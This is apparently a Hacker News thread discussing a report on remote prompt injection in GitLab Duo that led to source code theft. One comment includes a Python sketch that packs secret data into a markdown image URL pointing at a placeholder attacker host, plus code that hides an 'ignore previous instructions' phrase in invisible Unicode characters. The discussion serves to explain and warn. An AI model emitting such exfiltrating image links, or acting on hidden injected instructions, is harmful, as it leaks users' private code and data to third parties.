Remote Prompt Injection in Gitlab Duo Leads to Source Code Theft

legitsecurity.com

29 points by chillax 19 hours ago


cedws - 15 hours ago

Until prompt injection is fixed, if it ever is, I'm not plugging LLMs into anything. MCPs, IDEs, agents, forget it. I'll stick with a simple prompt box when I have a question and do whatever I need with its output by hand after reading it.

wunderwuzzi23 - 8 hours ago

Great work!

Data leakage via untrusted third-party servers (especially via image rendering) is one of the most common AI appsec issues, and it's concerning that big vendors don't catch these before shipping.
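
The core of the image vector is small enough to sketch. Roughly (the host and data below are placeholders, not from any specific report): the injected instructions ask the model to emit a markdown image whose URL carries the data, and the chat UI fetches that URL the moment it renders the reply.

    import base64

    # Placeholders for illustration only.
    secret = "private source code snippet"
    attacker_url = "https://attacker.example/pixel.png"

    # Pack the data so it survives as a query parameter.
    payload = base64.urlsafe_b64encode(secret.encode()).decode()

    # The injected prompt asks the model to output this markdown image.
    # When the chat client renders it, the browser requests the URL and
    # the query string hands the data to the attacker's server.
    print(f"![status]({attacker_url}?d={payload})")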

I built the ASCII Smuggler mentioned in the post, and I've documented the image exfiltration vector on my blog in the past as well, with 10+ findings across vendors.
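
For anyone curious, the smuggling trick itself is simple. A rough sketch of the idea (not the actual tool's code): printable ASCII gets remapped into the invisible Unicode Tags block, so the instructions vanish in most UIs but still reach the model.

    # Rough sketch of the hidden-text idea, not the actual ASCII Smuggler code.
    # Printable ASCII is shifted into the Unicode Tags block (U+E0000 + codepoint),
    # which most UIs render as nothing while the raw characters still reach the model.
    TAG_BASE = 0xE0000

    def hide(text: str) -> str:
        return "".join(chr(TAG_BASE + ord(c)) for c in text if 0x20 <= ord(c) <= 0x7E)

    def reveal(text: str) -> str:
        return "".join(
            chr(ord(c) - TAG_BASE)
            for c in text
            if TAG_BASE + 0x20 <= ord(c) <= TAG_BASE + 0x7E
        )

    hidden = hide("ignore previous instructions")
    print(repr(hidden))    # looks like escape sequences; renders as nothing
    print(reveal(hidden))  # the smuggled instruction comes back out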

GitHub Copilot Chat had a very similar bug last year.

mdaniel - 11 hours ago

Running Duo as a system user was crazypants, and I'm sad that GitLab fell into that trap. They already have personal access tokens, so even if they had to silently create one just for use with Duo, that would be a marked improvement over giving an LLM read access to every repo on the platform.
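
For illustration, a rough sketch of what a narrowly scoped, short-lived token for a dedicated Duo account could look like via the REST API (endpoint and parameters as I recall them from the docs, and every value is a placeholder, so verify against your GitLab version):

    # Rough sketch, assuming GitLab's admin endpoint for creating a user's
    # personal access token; check the exact parameters for your version.
    import requests

    GITLAB_URL = "https://gitlab.example.com"   # placeholder instance
    ADMIN_TOKEN = "glpat-REDACTED"              # placeholder admin token
    DUO_USER_ID = 4242                          # placeholder dedicated Duo account

    resp = requests.post(
        f"{GITLAB_URL}/api/v4/users/{DUO_USER_ID}/personal_access_tokens",
        headers={"PRIVATE-TOKEN": ADMIN_TOKEN},
        data={
            "name": "duo-read-only",
            "scopes[]": ["read_repository"],    # narrow scope, not platform-wide read
            "expires_at": "2025-06-30",         # short-lived on purpose
        },
    )
    resp.raise_for_status()
    print(resp.json()["token"])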

aestetix - 3 hours ago

Does that mean GitLab Duo can run Doom?

nusl - 16 hours ago

GitLab's remediation seems a bit sketchy at best.